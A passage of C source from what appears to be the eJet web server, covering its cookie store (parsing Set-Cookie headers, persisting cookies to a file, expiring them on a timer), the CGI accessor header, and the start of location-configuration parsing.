if (!mgmt) return -1;
if (!cookiefile) cookiefile = mgmt->cookie_file;
if (!cookiefile) return -2;
fp = fopen(cookiefile, "w");
if (!fp) return -3;
frm = frame_new(4096);
EnterCriticalSection(&mgmt->cookieCS);
num = ht_num(mgmt->domain_table);
for (i = 0; i < num; i++) {
ckdomain = ht_value(mgmt->domain_table, i);
if (!ckdomain) continue;
pathnum = arr_num(ckdomain->cookie_path_list);
for (j = 0; j < pathnum; j++) {
ckpath = arr_value(ckdomain->cookie_path_list, j);
if (!ckpath) continue;
cknum = arr_num(ckpath->cookie_list);
for (k = 0; k < cknum; k++) {
ckie = arr_value(ckpath->cookie_list, k);
if (!ckie || !ckie->name || ckie->namelen <= 0) continue;
if (!ckie->domain || ckie->domainlen <= 0) continue;
frame_empty(frm);
frame_appendf(frm, "%s=%s;", ckie->name, ckie->value ? ckie->value : "");
if (ckie->expire > 0) {
str_time2gmt(&ckie->expire, buf, sizeof(buf)-1, 0);
frame_appendf(frm, " Expires=%s;", buf);
}
if (ckie->maxage > 0) {
frame_appendf(frm, " Max-Age=%d;", ckie->maxage);
}
if (ckie->path && ckie->pathlen > 0)
frame_appendf(frm, " Path=%s;", ckie->path);
else
frame_appendf(frm, " Path=/;");
frame_appendf(frm, " Domain=%s;", ckie->domain);
if (ckie->httponly)
frame_appendf(frm, " HTTPOnly;");
if (ckie->secure)
frame_appendf(frm, " Secure;");
if (ckie->samesite == 1 || ckie->samesite == 2)
frame_appendf(frm, " SameSite=%s;", ckie->samesite == 1 ? "Strict" : "Lax");
frame_appendf(frm, " createtime=%lu", ckie->createtime);
fprintf(fp, "%s\n", frameS(frm));
}
}
}
LeaveCriticalSection(&mgmt->cookieCS);
frame_free(frm);
fclose(fp);
return 0;
}
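/* For illustration only (all values made up): each line persisted by
cookie_mgmt_write follows the frame_appendf format strings above, e.g.

    sid=abc123; Expires=Sun, 17 Dec 2023 08:21:33 GMT; Max-Age=3600; Path=/; Domain=example.com; HTTPOnly; Secure; createtime=1700000000
*/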
int cookie_mgmt_scan (void * vmgmt)
{
CookieMgmt * mgmt = (CookieMgmt *)vmgmt;
HTTPMgmt * httpmgmt = NULL;
cookie_path_t * ckpath = NULL;
cookie_t * ckie = NULL;
int rmnum = 0;
int i, num;
time_t curt = 0;
if (!mgmt) return -1;
httpmgmt = (HTTPMgmt *)mgmt->httpmgmt;
if (!httpmgmt) return -2;
curt = time(0);
EnterCriticalSection(&mgmt->cookieCS);
num = arr_num(mgmt->cookie_list);
for (i = 0; i < num; i++) {
ckie = arr_value(mgmt->cookie_list, i);
if (!ckie) continue;
if ((ckie->expire > 0 && ckie->expire < curt) ||
(ckie->maxage > 0 && ckie->createtime + ckie->maxage < curt)
) {
arr_delete(mgmt->cookie_list, i); i--; num--;
ckpath = ckie->ckpath;
if (ckpath)
arr_delete_ptr(ckpath->cookie_list, ckie);
http_cookie_free(ckie);
rmnum++;
}
}
LeaveCriticalSection(&mgmt->cookieCS);
if (rmnum > 0) {
cookie_mgmt_write(mgmt, mgmt->cookie_file);
}
if (arr_num(mgmt->cookie_list) > 0)
mgmt->scan_timer = iotimer_start(httpmgmt->pcore,
10*60*1000,
t_http_cookie_scan,
NULL,
cookie_callback, mgmt);
return rmnum;
}
int cookie_mgmt_add (void * vmgmt, void * vckie)
{
CookieMgmt * mgmt = (CookieMgmt *)vmgmt;
HTTPMgmt * httpmgmt = NULL;
cookie_t * ckie = (cookie_t *)vckie;
cookie_domain_t * ckdomain = NULL;
cookie_path_t * ckpath = NULL;
cookie_t * iter = NULL;
int i, num;
if (!mgmt) return -1;
if (!ckie) return -2;
httpmgmt = (HTTPMgmt *)mgmt->httpmgmt;
if (!httpmgmt) return -3;
EnterCriticalSection(&mgmt->cookieCS);
/* get the domain object, if not existing, create it */
ckdomain = cookie_mgmt_domain_get(mgmt, ckie->domain, ckie->domainlen);
if (!ckdomain) {
ckdomain = cookie_domain_alloc();
if (!ckdomain) {
LeaveCriticalSection(&mgmt->cookieCS);
return -100;
}
str_secpy(ckdomain->domain, sizeof(ckdomain->domain)-1, ckie->domain, ckie->domainlen);
actrie_add(mgmt->domain_trie, ckie->domain, ckie->domainlen, ckdomain);
cookie_mgmt_domain_set(mgmt, ckie->domain, ckie->domainlen, ckdomain);
}
/* get the path object of the domain, if not existing, create it */
ckpath = cookie_domain_path_get(ckdomain, ckie->path, ckie->pathlen);
if (!ckpath) {
ckpath = cookie_path_alloc();
if (!ckpath) {
LeaveCriticalSection(&mgmt->cookieCS);
return -200;
}
str_secpy(ckpath->path, sizeof(ckpath->path)-1, ckie->path, ckie->pathlen);
actrie_add(ckdomain->cookie_path_trie, ckie->path, ckie->pathlen, ckpath);
arr_push(ckdomain->cookie_path_list, ckpath);
}
/* iterate the cookie list to find an existing one */
num = arr_num(ckpath->cookie_list);
for (i = 0; i < num; i++) {
iter = arr_value(ckpath->cookie_list, i);
if (!iter) continue;
if (iter->namelen != ckie->namelen) continue;
if (strncasecmp(iter->name, ckie->name, iter->namelen) == 0) {
if (iter->valuelen != ckie->valuelen ||
strncasecmp(iter->value, ckie->value, iter->valuelen) != 0) {
if (iter->value) kfree(iter->value);
iter->value = str_dup(ckie->value, ckie->valuelen);
iter->valuelen = ckie->valuelen;
}
iter->expire = ckie->expire;
iter->maxage = ckie->maxage;
iter->httponly = ckie->httponly;
iter->secure = ckie->secure;
iter->samesite = ckie->samesite;
iter->createtime = ckie->createtime;
iter->ckpath = ckpath;
LeaveCriticalSection(&mgmt->cookieCS);
return 0;
}
}
/* not found an existing cookie object in ckpath object */
arr_push(ckpath->cookie_list, ckie);
ckie->ckpath = ckpath;
arr_push(mgmt->cookie_list, ckie);
LeaveCriticalSection(&mgmt->cookieCS);
if (mgmt->scan_timer == NULL)
mgmt->scan_timer = iotimer_start(httpmgmt->pcore,
10*60*1000,
t_http_cookie_scan,
NULL,
cookie_callback, mgmt);
return 1;
}
void * cookie_mgmt_get (void * vmgmt, char * domain, int domainlen,
char * path, int pathlen, char * ckname, int cklen)
{
CookieMgmt * mgmt = (CookieMgmt *)vmgmt;
cookie_domain_t * ckdomain = NULL;
cookie_path_t * ckpath = NULL;
cookie_t * iter = NULL;
int i, num;
int ret = 0;
if (!mgmt) return NULL;
if (!domain) return NULL;
if (domainlen < 0) domainlen = strlen(domain);
if (domainlen <= 0) return NULL;
if (!path) return NULL;
if (pathlen < 0) pathlen = strlen(path);
if (pathlen <= 0) return NULL;
if (!ckname) return NULL;
if (cklen < 0) cklen = strlen(ckname);
if (cklen <= 0) return NULL;
EnterCriticalSection(&mgmt->cookieCS);
ret = actrie_get(mgmt->domain_trie, domain, domainlen, (void **)&ckdomain);
if (ret <= 0 || !ckdomain) {
LeaveCriticalSection(&mgmt->cookieCS);
return NULL;
}
ret = actrie_get(ckdomain->cookie_path_trie, path, pathlen, (void **)&ckpath);
if (ret <= 0 || !ckpath) {
LeaveCriticalSection(&mgmt->cookieCS);
return NULL;
}
/* iterate the cookie list to find an existing one */
num = arr_num(ckpath->cookie_list);
for (i = 0; i < num; i++) {
iter = arr_value(ckpath->cookie_list, i);
if (!iter) continue;
if (iter->namelen != cklen) continue;
if (strncasecmp(iter->name, ckname, cklen) == 0) {
LeaveCriticalSection(&mgmt->cookieCS);
return iter;
}
}
LeaveCriticalSection(&mgmt->cookieCS);
return NULL;
}
int cookie_mgmt_mget (void * vmgmt, char * domain, int domainlen, char * path, int pathlen, arr_t ** cklist)
{
CookieMgmt * mgmt = (CookieMgmt *)vmgmt;
cookie_domain_t * ckdomain = NULL;
cookie_path_t * ckpath = NULL;
int ret = 0;
if (!mgmt) return -1;
if (!domain) return -2;
if (domainlen < 0) domainlen = strlen(domain);
if (domainlen <= 0) return -3;
if (!path) return -4;
if (pathlen < 0) pathlen = strlen(path);
if (pathlen <= 0) return -5;
EnterCriticalSection(&mgmt->cookieCS);
ret = actrie_get(mgmt->domain_trie, domain, domainlen, (void **)&ckdomain);
if (ret <= 0 || !ckdomain) {
LeaveCriticalSection(&mgmt->cookieCS);
return -100;
}
ret = actrie_get(ckdomain->cookie_path_trie, path, pathlen, (void **)&ckpath);
if (ret <= 0 || !ckpath) {
LeaveCriticalSection(&mgmt->cookieCS);
return -200;
}
if (cklist) *cklist = ckpath->cookie_list;
ret = arr_num(ckpath->cookie_list);
LeaveCriticalSection(&mgmt->cookieCS);
return ret;
}
int cookie_mgmt_set (void * vmgmt, char * ckname, int cknlen, char * ckvalue, int ckvlen,
char * domain, int domainlen, char * path, int pathlen, time_t expire,
int maxage, uint8 httponly, uint8 secure, uint8 samesite)
{
CookieMgmt * mgmt = (CookieMgmt *)vmgmt;
cookie_t * ckie = NULL;
if (!mgmt) return -1;
if (!ckname) return -2;
if (cknlen < 0) cknlen = strlen(ckname);
if (cknlen <= 0) return -3;
if (!ckvalue) return -2;
if (ckvlen < 0) ckvlen = strlen(ckvalue);
if (ckvlen <= 0) return -3;
if (!domain) return -2;
if (domainlen < 0) domainlen = strlen(domain);
if (domainlen <= 0) return -3;
if (!path) return -2;
if (pathlen < 0) pathlen = strlen(path);
if (pathlen <= 0) return -3;
ckie = http_cookie_alloc();
if (!ckie) return -100;
/* duplicate the caller's buffers so http_cookie_free() can safely kfree them later */
ckie->name = str_dup(ckname, cknlen);
ckie->namelen = cknlen;
ckie->value = str_dup(ckvalue, ckvlen);
ckie->valuelen = ckvlen;
ckie->domain = str_dup(domain, domainlen);
ckie->domainlen = domainlen;
ckie->path = str_dup(path, pathlen);
ckie->pathlen = pathlen;
ckie->expire = expire;
ckie->maxage = maxage;
ckie->httponly = httponly;
ckie->secure = secure;
ckie->samesite = samesite;
if (cookie_mgmt_add(mgmt, ckie) <= 0)
http_cookie_free(ckie);
return 0;
}
int cookie_mgmt_parse (void * vmgmt, char * pbyte, int bytelen, char * defdom, int defdomlen)
{
CookieMgmt * mgmt = (CookieMgmt *)vmgmt;
cookie_t * ckie = NULL;
arr_t * cklist = NULL;
char * domain = NULL;
int domainlen = 0;
char * path = NULL;
int pathlen = 0;
time_t expire = 0;
int maxage = 0;
uint8 httponly = 0;
uint8 secure = 0;
uint8 samesite = 0;
time_t createtime = 0;
char * plist[32];
int plen[32];
char * key;
int keylen;
char * data;
int datalen;
char * p;
char * pend;
int i, num;
char * pkv[2];
int kvlen[2];
int ret;
if (!mgmt) return -1;
if (!pbyte) return -2;
if (bytelen < 0) bytelen = strlen(pbyte);
if (bytelen <= 0) return -3;
num = string_tokenize(pbyte, bytelen, ";", 1, (void **)plist, plen, 32);
if (num <= 0) return -100;
cklist = arr_new(4);
for (i = 0; i < num; i++) {
pend = plist[i] + plen[i];
p = skipOver(plist[i], plen[i], " \t\r\n;", 5);
if (p >= pend) continue;
ret = string_tokenize(p, pend-p, "=", 1, (void **)pkv, kvlen, 2);
if (ret <= 0) continue;
key = pkv[0]; pend = key + kvlen[0];
p = rskipOver(pend-1, pend-key, " \t\r\n=;", 6);
if (p < key) continue;
keylen = p - key + 1;
if (ret < 2) {
data = NULL;
datalen = 0;
} else {
data = pkv[1]; pend = data + kvlen[1];
p = rskipOver(pend-1, pend-data, " \t\r\n;=", 6);
if (p < data) datalen = 0;
else datalen = p - data + 1;
}
if (keylen == 4 && strncasecmp(key, "path", 4) == 0) {
path = data; pathlen = datalen;
} else if (keylen == 6 && strncasecmp(key, "domain", 6) == 0) {
pend = data + datalen;
data = skipOver(data, pend-data, " .\t", 3);
domain = data; domainlen = pend-data;
} else if (keylen == 7 && strncasecmp(key, "expires", 7) == 0) {
str_gmt2time(data, datalen, &expire);
} else if (keylen == 7 && strncasecmp(key, "max-age", 7) == 0) {
maxage = str_to_int(data, datalen, 10, NULL);
} else if (keylen == 8 && strncasecmp(key, "samesite", 8) == 0) {
if (datalen == 6 && strncasecmp(data, "Strict", 6) == 0)
samesite = 1;
else if (datalen == 3 && strncasecmp(data, "Lax", 3) == 0)
samesite = 2;
else
samesite = 0;
} else if (keylen == 6 && strncasecmp(key, "secure", 6) == 0) {
if (data == NULL || datalen <= 0)
secure = 1;
} else if (keylen == 8 && strncasecmp(key, "httponly", 8) == 0) {
if (data == NULL || datalen <= 0)
httponly = 1;
} else if (keylen == 10 && strncasecmp(key, "createtime", 10) == 0) {
if (data && datalen > 0)
createtime = strtoull(data, NULL, 10);
} else {
ckie = http_cookie_alloc();
ckie->name = str_dup(key, keylen);
ckie->namelen = keylen;
ckie->value = str_dup(data, datalen);
ckie->valuelen = datalen;
arr_push(cklist, ckie);
}
}
if (!domain || domainlen <= 0) {
domain = defdom;
domainlen = defdomlen;
}
num = arr_num(cklist);
for (i = 0; i < num; i++) {
ckie = arr_value(cklist, i);
if (!ckie) continue;
ckie->path = str_dup(path, pathlen);
ckie->pathlen = pathlen;
ckie->domain = str_dup(domain, domainlen);
ckie->domainlen = domainlen;
ckie->expire = expire;
ckie->maxage = maxage;
ckie->secure = secure;
ckie->httponly = httponly;
ckie->samesite = samesite;
if (createtime > 0)
ckie->createtime = createtime;
if (cookie_mgmt_add(mgmt, ckie) <= 0) {
tolog(1, "eJet - Update Cookie: %s=%s; path=%s; domain=%s; expire=%ld; maxage=%d%s%s%s\n",
ckie->name, ckie->value, ckie->path, ckie->domain, ckie->expire, ckie->maxage,
ckie->secure > 0 ? "; Secure" : "",
ckie->httponly > 0 ? "; HTTPOnly" : "",
ckie->samesite == 1 ? "; Strict" : (ckie->samesite == 2 ? "; Lax" : ""));
http_cookie_free(ckie);
} else {
tolog(1, "eJet - New Cookie: %s=%s; path=%s; domain=%s; expire=%ld; maxage=%d%s%s%s\n",
ckie->name, ckie->value, ckie->path, ckie->domain, ckie->expire, ckie->maxage,
ckie->secure > 0 ? "; Secure" : "",
ckie->httponly > 0 ? "; HTTPOnly" : "",
ckie->samesite == 1 ? "; Strict" : (ckie->samesite == 2 ? "; Lax" : ""));
}
}
arr_free(cklist);
if (num > 0)
cookie_mgmt_write(mgmt, mgmt->cookie_file);
return 0;
}
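/* Hypothetical call sketch (the cookie string and domain are examples, not taken
from the project). A mutable buffer is used because string_tokenize may operate
on the bytes in place:

    char line[] = "sid=abc123; Path=/; Max-Age=3600; HttpOnly";
    cookie_mgmt_parse(mgmt, line, -1, "example.com", 11);
*/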
int cookie_callback (void * vmgmt, void * vobj, int event, int fdtype)
{
CookieMgmt * mgmt = (CookieMgmt *)vmgmt;
int cmd;
if (!mgmt) return -1;
switch (event) {
case IOE_TIMEOUT:
cmd = iotimer_cmdid(vobj);
if (cmd == t_http_cookie_scan) {
mgmt->scan_timer = NULL;
return cookie_mgmt_scan(mgmt);
}
break;
}
return -1;
}
int http_cookie_add (void * vmsg)
{
HTTPMsg * msg = (HTTPMsg *)vmsg;
HTTPMgmt * httpmgmt = NULL;
CookieMgmt * ckiemgmt = NULL;
cookie_t * ckie = NULL;
arr_t * cklist = NULL;
HeaderUnit * unit = NULL;
frame_t * frm = NULL;
int ret = 0;
int i, num;
if (!msg) return -1;
httpmgmt = (HTTPMgmt *)msg->httpmgmt;
if (!httpmgmt) return -2;
ckiemgmt = (CookieMgmt *)httpmgmt->cookiemgmt;
if (!ckiemgmt) return -3;
ret = cookie_mgmt_mget(ckiemgmt, msg->req_host, msg->req_hostlen,
msg->req_path, msg->req_pathlen, &cklist);
if (ret <= 0 || !cklist) return -100;
frm = frame_new(4096);
unit = http_header_get(msg, 0, "Cookie", -1);
if (unit && unit->valuelen > 0) {
frame_put_nfirst(frm, HUValue(unit), unit->valuelen);
}
num = arr_num(cklist);
for (i = 0, ret = 0; i < num; i++) {
ckie = arr_value(cklist, i);
if (!ckie) continue;
frame_appendf(frm, "%s%s=%s", frameL(frm) > 0 ? "; " : "", ckie->name, ckie->value);
ret++;
}
if (ret > 0) {
http_header_del(msg, 0, "Cookie", -1);
http_header_append(msg, 0, "Cookie", -1, frameP(frm), frameL(frm));
}
frame_free(frm);
return 0;
}
int http_set_cookie_parse (void * vmsg)
{
HTTPMsg * msg = (HTTPMsg *)vmsg;
HTTPMgmt * httpmgmt = NULL;
CookieMgmt * ckiemgmt = NULL;
HeaderUnit * unit = NULL;
int ret = 0;
if (!msg) return -1;
httpmgmt = (HTTPMgmt *)msg->httpmgmt;
if (!httpmgmt) return -2;
ckiemgmt = (CookieMgmt *)httpmgmt->cookiemgmt;
if (!ckiemgmt) return -3;
unit = http_header_get(msg, 1, "Set-Cookie", -1);
while (unit && unit->valuelen > 0) {
ret = cookie_mgmt_parse(ckiemgmt, HUValue(unit), unit->valuelen, msg->req_host, msg->req_hostlen);
unit = unit->next;
}
return ret;
}
<|start_filename|>include/http_cgi.h<|end_filename|>
/*
* Copyright (c) 2003-2021 <NAME> <<EMAIL>>
* All rights reserved. See MIT LICENSE for redistribution.
*/
#ifndef _HTTP_CGI_H_
#define _HTTP_CGI_H_
#ifdef __cplusplus
extern "C" {
#endif
void * GetHTTPMgmt (void * vmsg);
void * GetEPump (void * vmsg);
void * GetIODev (void * vmsg);
frame_p GetFrame (void * vmsg);
int RecycleFrame (void * vmsg, frame_p frame);
char * GetRootPath (void * vmsg);
int GetPathP (void * vmsg, char ** ppath, int * pathlen);
int GetReqPath (void * vmsg, char * path, int pathlen);
int GetRealPath (void * vmsg, char * path, int pathlen);
int GetRealFile (void * vmsg, char * path, int pathlen);
int GetLocFile (void * vmsg, char * p, int len, char * f, int flen, char * d, int dlen);
int GetPathOnly (void * vmsg, char * path, int pathlen);
int GetFileOnly (void * vmsg, char * path, int pathlen);
int GetFileExt (void * vmsg, char * path, int pathlen);
int GetMethodInd (void * vmsg);
char * GetMethod (void * vmsg);
int GetBaseURL (void * vmsg, char ** pbase, int * plen);
char * GetAbsURL (void * vmsg);
char * GetRelative (void * vmsg);
char * GetURL (void * vmsg);
char * GetDocURL (void * vmsg);
int GetSchemeP (void * vmsg, char ** pscheme, int * schemelen);
int GetScheme (void * vmsg, char * scheme, int schemelen);
int GetHostP (void * vmsg, char ** phost, int * hostlen);
int GetHost (void * vmsg, char * host, int hostlen);
int GetPort (void * vmsg);
int GetQueryP (void * vmsg, char ** pquery, int * pquerylen);
int GetQuery (void * vmsg, char * query, int querylen);
int GetQueryValueP (void * vmsg, char * key, char ** pval, int * vallen);
int GetQueryValue (void * vmsg, char * key, char * val, int vallen);
int GetQueryUint (void * vmsg, char * key, uint32 * val);
int GetQueryInt (void * vmsg, char * key, int * val);
int GetQueryUlong (void * vmsg, char * key, ulong * val);
int GetQueryInt64 (void * vmsg, char * key, int64 * val);
int GetQueryUint64 (void * vmsg, char * key, uint64 * val);
int GetQueryLong (void * vmsg, char * key, long * val);
int GetQueryKeyExist (void * vmsg, char * key);
int GetReqContent (void * vmsg, void * body, int bodylen);
int GetReqContentP (void * vmsg, void ** pbody, int * bodylen);
int GetReqFormJsonValueP (void * vmsg, char * key, char ** ppval, int * vallen);
int GetReqFormJsonValue (void * vmsg, char * key, char * pval, int vallen);
int GetReqFormJsonKeyExist (void * vmsg, char * key);
int GetReqFormDecodeValueP (void * vmsg, char * key, char ** ppval, int * vallen);
int GetReqFormDecodeValue (void * vmsg, char * key, char * pval, int vallen);
int GetReqFormValueP (void * vmsg, char * key, char ** ppval, int * vallen);
int GetReqFormValue (void * vmsg, char * key, char * pval, int vallen);
int GetReqFormUint (void * vmsg, char * key, uint32 * val);
int GetReqFormInt (void * vmsg, char * key, int * val);
int GetReqFormUlong (void * vmsg, char * key, ulong * val);
int GetReqFormLong (void * vmsg, char * key, long * val);
int GetReqFormUint64 (void * vmsg, char * key, uint64 * val);
int GetReqFormKeyExist (void * vmsg, char * key);
int GetReqHdrNum (void * vmsg);
int GetReqHdrIndP (void * vmsg, int index, char ** pname, int * namelen,
char ** pvalue, int * valuelen);
int GetReqHdrInd (void * vmsg, int index, char * name, int namelen,
char * value, int valuelen);
int GetReqHdr (void * vmsg, char * name, int namelen, char * value, int valuelen);
int GetReqHdrP (void * vmsg, char * name, int namelen, char ** pval, int * vallen);
int GetReqHdrInt (void * vmsg, char * name, int namelen);
long GetReqHdrLong (void * vmsg, char * name, int namelen);
ulong GetReqHdrUlong (void * vmsg, char * name, int namelen);
int64 GetReqHdrInt64 (void * vmsg, char * name, int namelen);
uint64 GetReqHdrUint64 (void * vmsg, char * name, int namelen);
int GetReqContentTypeP (void * vmsg, char ** ptype, int * typelen);
int GetReqContentType (void * vmsg, char * type, int typelen);
int GetReqContentLength (void * vmsg);
int GetReqEtag (void * vmsg, char * etag, int etaglen);
int GetCookieP (void * vmsg, char * name, int nlen, char ** pv, int * vlen);
int GetCookie (void * vmsg, char * name, int nlen, char * val, int vlen);
int AddReqHdr (void * vmsg, char * name, int namelen, char * value, int valuelen);
int AddReqHdrInt (void * vmsg, char * name, int namelen, int value);
int AddReqHdrUint32 (void * vmsg, char * name, int namelen, uint32 value);
int AddReqHdrLong (void * vmsg, char * name, int namelen, long value);
int AddReqHdrUlong (void * vmsg, char * name, int namelen, ulong value);
int AddReqHdrInt64 (void * vmsg, char * name, int namelen, int64 value);
int AddReqHdrUint64 (void * vmsg, char * name, int namelen, uint64 value);
int AddReqHdrDate (void * vmsg, char * name, int namelen, time_t dtime);
int DelReqHdr (void * vmsg, char * name, int namelen);
int SetResEtag (void * vmsg, char * etag, int etaglen);
int SetCookie (void * vmsg, char * name, char * value, time_t expire,
char * path, char * domain, uint8 secure);
int SetReqContentType (void * vmsg, char * type, int typelen);
int SetReqContentLength (void * vmsg, int64 len);
int SetReqContent (void * vmsg, void * body, int bodylen);
int SetReqFileContent (void * vmsg, char * filename);
int AddReqContent (void * vmsg, void * body, int64 bodylen);
int AddReqContentPtr (void * vmsg, void * body, int64 bodylen);
int AddReqFile (void * vmsg, char * filename, int64 startpos, int64 len);
int AddReqAppCBContent (void * vmsg, void * fetchfunc, void * fetchobj, int64 offset, int64 length,
void * movefunc, void * movepara, void * endfetch, void * endobj);
int GetResHdrNum (void * vmsg);
int GetResHdrIndP (void * vmsg, int index, char ** pname, int * namelen,
char ** pvalue, int * valuelen);
int GetResHdrInd (void * vmsg, int index, char * name, int namelen,
char * value, int valuelen);
int GetResHdr (void * vmsg, char * name, int namelen, char * value, int valuelen);
int GetResHdrP (void * vmsg, char * name, int namelen, char ** pval, int * vallen);
int GetResHdrInt (void * vmsg, char * name, int namelen);
long GetResHdrLong (void * vmsg, char * name, int namelen);
ulong GetResHdrUlong (void * vmsg, char * name, int namelen);
int64 GetResHdrInt64 (void * vmsg, char * name, int namelen);
uint64 GetResHdrUint64 (void * vmsg, char * name, int namelen);
int GetResContentTypeP (void * vmsg, char ** ptype, int * typelen);
int GetResContentType (void * vmsg, char * type, int typelen);
int GetResContentTypeID (void * vmsg, uint32 * mimeid, char ** pext);
int64 GetResContentLength (void * vmsg);
int GetResContent (void * vmsg, void * body, int bodylen);
int GetResContentP (void * vmsg, int64 pos, void ** pbody, int64 * bodylen);
int GetStatus (void * vmsg, char * reason, int * reasonlen);
int SetStatus (void * vmsg, int code, char * reason);
int AddResHdr (void * vmsg, char * name, int namelen, char * value, int valuelen);
int AddResHdrInt (void * vmsg, char * name, int namelen, int value);
int AddResHdrUint32 (void * vmsg, char * name, int namelen, uint32 value);
int AddResHdrLong (void * vmsg, char * name, int namelen, long value);
int AddResHdrUlong (void * vmsg, char * name, int namelen, ulong value);
int AddResHdrInt64 (void * vmsg, char * name, int namelen, int64 value);
int AddResHdrUint64 (void * vmsg, char * name, int namelen, uint64 value);
int AddResHdrDate (void * vmsg, char * name, int namelen, time_t dtime);
int DelResHdr (void * vmsg, char * name, int namelen);
int Check304Resp (void * vmsg, uint64 mediasize, time_t mtime, uint32 inode);
int SetResContentType (void * vmsg, char * type, int typelen);
int SetResContentTypeID (void * vmsg, uint32 mimeid);
int SetResContentLength (void * vmsg, int64 len);
int AddResContent (void * vmsg, void * body, int64 bodylen);
int AddResStripContent (void * vmsg, void * body, int64 bodylen, char * escch, int chlen);
int AddResContentPtr (void * vmsg, void * body, int64 bodylen);
int AddResFile (void * vmsg, char * filename, int64 startpos, int64 len);
int AddResAppCBContent (void * vmsg, void * fetchfunc, void * fetchobj, int64 offset, int64 length,
void * movefunc, void * movepara, void * endfetch, void * endobj);
int AsynReply (void * vmsg, int bodyend, int probewrite);
int Reply (void * vmsg);
int ReplyFeeding (void * vmsg);
int ReplyFeedingEnd (void * vmsg);
int RedirectReply (void * vmsg, int status, char * url);
#ifdef __cplusplus
}
#endif
#endif
<|start_filename|>src/http_listen.c<|end_filename|>
/*
* Copyright (c) 2003-2021 <NAME> <<EMAIL>>
* All rights reserved. See MIT LICENSE for redistribution.
*/
#ifdef UNIX
#include <dlfcn.h>
#include <regex.h>
#endif
#if defined(_WIN32) || defined(_WIN64)
#define PCRE_STATIC 1
#include "pcre.h"
#endif
#include "adifall.ext"
#include "epump.h"
#include "http_listen.h"
#include "http_msg.h"
#include "http_mgmt.h"
#include "http_ssl.h"
#include "http_pump.h"
#include "http_variable.h"
#include "http_script.h"
#include "http_pagetpl.h"
void * http_loc_alloc (char * path, int pathlen, uint8 pathdup, int matchtype, int servtype, char * root)
{
HTTPLoc * ploc = NULL;
char * ptmp = NULL;
if (!path) return NULL;
if (pathlen < 0) pathlen = strlen(path);
if (pathlen <= 0) return NULL;
if (servtype == SERV_SERVER || servtype == SERV_UPLOAD) { //file or upload
/* check if the root path exists */
if (!root) return NULL;
}
ploc = kzalloc(sizeof(*ploc));
if (!ploc) return NULL;
if (pathdup) {
ploc->path = str_dup(path, pathlen);
ploc->path_dup = 1;
} else {
ploc->path = path;
ploc->path_dup = 0;
}
ploc->matchtype = matchtype;
ploc->type = servtype;
//if (!root) root = ".";
if (root && strlen(root) > 0 && (ptmp = realpath(root, NULL))) {
str_secpy(ploc->root, sizeof(ploc->root)-1, ptmp, strlen(ptmp));
free(ptmp);
if (ploc->root[strlen(ploc->root) - 1] == '/')
ploc->root[strlen(ploc->root) - 1] = '\0';
/*if (!file_is_dir(ploc->root)) {
file_dir_create(ploc->root, 0);
}*/
}
ploc->script_list = arr_new(2);
ploc->reply_script_list = arr_new(2);
return ploc;
}
void http_loc_free (void * vloc)
{
HTTPLoc * ploc = (HTTPLoc *)vloc;
if (!ploc) return;
if (ploc->path_dup) kfree(ploc->path);
arr_pop_kfree(ploc->reply_script_list);
arr_pop_kfree(ploc->script_list);
kfree(ploc);
}
int http_loc_set_root (void * vloc, char * root, int rootlen)
{
HTTPLoc * ploc = (HTTPLoc *)vloc;
if (!ploc) return -1;
return str_secpy(ploc->root, sizeof(ploc->root) - 1, root, rootlen);
}
int http_loc_set_index (void * vloc, char ** indexlist, int num)
{
HTTPLoc * ploc = (HTTPLoc *)vloc;
int i;
if (!ploc) return -1;
if (!indexlist || num <= 0) return -2;
ploc->indexnum = num;
for (i = 0; i < num; i++) {
ploc->index[i] = indexlist[i];
}
return num;
}
int http_loc_set_proxy (void * vloc, char * passurl, char * cachefile)
{
HTTPLoc * ploc = (HTTPLoc *)vloc;
if (!ploc) return -1;
if (!passurl) return -2;
ploc->type = SERV_PROXY;
ploc->passurl = passurl;
if (cachefile) {
ploc->cache = 1;
ploc->cachefile = cachefile;
}
return 0;
}
int http_loc_set_fastcgi (void * vloc, char * passurl)
{
HTTPLoc * ploc = (HTTPLoc *)vloc;
if (!ploc) return -1;
if (!passurl) return -2;
ploc->type = SERV_FASTCGI;
ploc->passurl = passurl;
return 0;
}
int http_loc_cmp_path (void * vloc, void * vpath)
{
HTTPLoc * ploc = (HTTPLoc *)vloc;
char * path = (char *)vpath;
if (!ploc) return -1;
if (!path) return 1;
return strcasecmp(ploc->path, path);
}
int http_loc_build (void * vhost, void * jhost)
{
HTTPHost * host = (HTTPHost *)vhost;
HTTPLoc * ploc = NULL;
HTTPLoc * ptmp = NULL;
#ifdef UNIX
regex_t * preg = NULL;
#endif
#if defined(_WIN32) || defined(_WIN64)
char * errstr = NULL;
int erroff = 0;
pcre * preg = NULL;
#endif
int i, locnum;
int ret = 0, subret = 0;
int j = 0;
char key[128];
char * value = NULL;
int valuelen = 0;
void * jloc = NULL;
char * path = NULL;
int matchtype = MATCH_DEFAULT;
int type = 0;
char * root = NULL;
if (!host) return -1;
if (!jhost) return -2;
sprintf(key, "location");
ret = json_mget_obj(jhost, key, -1, &jloc);
if (ret <= 0) {
/* here one default HTTPLoc should be created and appended */
tolog(1, "eJet - HTTPHost <%s> has no <Location> configure option!\n", host->hostname);
return -100;
}
for (locnum = ret, i = 1; i <= locnum && jloc != NULL; i++) {
path = NULL;
matchtype = MATCH_DEFAULT;
type = 0;
root = NULL;
ret = json_mgetP(jloc, "path", -1, (void **)&value, &valuelen);
if (ret > 0 && value && valuelen > 0) {
path = value;
if (ret > 1) {
ret = json_mgetP(jloc, "path[1]", -1, (void **)&value, &valuelen);
if (value && valuelen > 0) {
if (strcmp(value, "=") == 0)
matchtype = MATCH_EXACT; //1, exact matching
else if (strcmp(value, "^~") == 0)
matchtype = MATCH_PREFIX; //2, prefix matching
else if (strcmp(value, "~") == 0)
matchtype = MATCH_REGEX_CASE; //3, case-sensitive regex matching
else if (strcmp(value, "~*") == 0)
matchtype = MATCH_REGEX_NOCASE; //4, regex matching ignoring case
} else {
matchtype = MATCH_PREFIX; //2, prefix matching
}
} else {
matchtype = MATCH_PREFIX; //2, prefix matching
}
if (strcmp(path, "/") == 0)
matchtype = MATCH_DEFAULT; //0, default
} else {
matchtype = MATCH_DEFAULT; //0, default when the path member does not exist
}
ret = json_mgetP(jloc, "type", -1, (void **)&value, &valuelen);
if (ret > 0 && value && valuelen > 0) {
if (strcasecmp(value, "server") == 0)
type = SERV_SERVER;
else if (strcasecmp(value, "upload") == 0)
type = SERV_UPLOAD;
else if (strcasecmp(value, "proxy") == 0)
type = SERV_PROXY;
else if (strcasecmp(value, "fastcgi") == 0)
